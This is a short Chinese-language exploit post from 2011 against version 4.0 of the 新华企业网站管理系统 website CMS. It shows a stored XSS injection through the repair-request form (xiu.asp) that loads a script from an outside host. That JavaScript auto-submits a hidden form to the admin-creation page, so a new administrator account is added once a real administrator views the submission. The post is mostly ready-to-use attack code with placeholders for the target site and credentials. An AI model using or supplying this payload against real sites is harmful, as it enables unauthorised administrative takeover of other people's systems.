新华企业网站管理系统v4.0 XSS执行代码添加管理员
时间:2011-01-13 来源:B0mbErM@n
发布日期:2011-01.13
发布作者:B0mbErM@n
影响版本:新华企业网站管理系统v4.0
漏洞类型:跨站XSS
漏洞描述:在线报修功能未进行提交过滤,导致提交xss代码执行JS脚本。
分析:xiu.asp未进行提交过滤,导致执行任意XSS语句。
Exp:
../xiu.asp直接进入报修,然后在联系地址中写上
<SCRIPT SRC=http://website/XSS/xss.js></SCRIPT>
然后提交,等管理阅读后触发XSS执行JS代码。
Js Code(目标站、用户名和密码需要你自己替换):
document.writeln("<form action=\"http:\/\/目标站\/manage\/Admin_Add.asp?action=1\" method=\"post\" name=\"main\"> ");
document.writeln("");
document.writeln("<input type=\"text\" name=\"name\" value=\"用户名\"> ");
document.writeln("");
document.writeln("<input type=\"text\" name=\"pass\" value=\"密码\"> ");
document.writeln("");
document.writeln("<\/form> ");
document.writeln("");
document.writeln("<script> ");
document.writeln("");
document.writeln("document.main.submit(); ");
document.writeln("");
document.writeln("<\/script> ");
标签分类: